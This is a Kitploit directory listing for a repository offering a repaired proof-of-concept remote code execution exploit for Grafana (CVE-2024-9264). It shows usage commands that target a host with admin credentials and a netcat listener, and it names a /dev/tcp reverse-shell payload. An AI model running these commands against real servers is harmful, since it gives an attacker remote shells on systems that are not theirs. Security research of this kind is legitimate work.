Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-9264-Fixed | Kitploit
Tools/GitHubGitHub/exerrdev/cve-2024-9264-fixed
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationRemote Access ToolPayload Development
GitHubexerrdev/cve-2024-9264-fixed

CVE-2024-9264-Fixed

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🛠️ CVE-2024-9264 - Fixed Grafana RCE Exploit

This is a fixed version of the proof-of-concept exploit for CVE-2024-9264, a critical remote code execution vulnerability in Grafana (via SQL expressions and DuckDB).

🔗 Original advisory: Grafana Security Release
❌ Original PoC: Broken due to syntax errors and incorrect use of write_file()
✅ This version works, tested on a vulnerable Grafana 11.0.0 instance.


✅ Fixes in this version

  • ✅ Correctly uses writefile() instead of write_file() (DuckDB function)
  • ✅ Proper shell payload using bash -i >& /dev/tcp/...
  • ✅ Reverse shell written and executed successfully via shellfs extension

📦 Requirements

  • Grafana instance with:
    • DuckDB backend
    • Ability to install shellfs from community
  • A netcat listener on your attacker machine

🚀 Usage

root@kitploit:~
python3 fixed_poc_writefile.py \
  --url http://target:3000 \
  --username admin \
  --password admin \
  --reverse-ip <YOUR_IP> \
  --reverse-port 4444

Then listen with:

root@kitploit:~
nc -lvnp 4444

⚠️ Legal Disclaimer

This project is for educational purposes only.
Do not use it against targets you do not have permission to test.


✍️ Author of this Fix

Modified and validated by Exerr — original PoC by z3k0sec.

Download Tool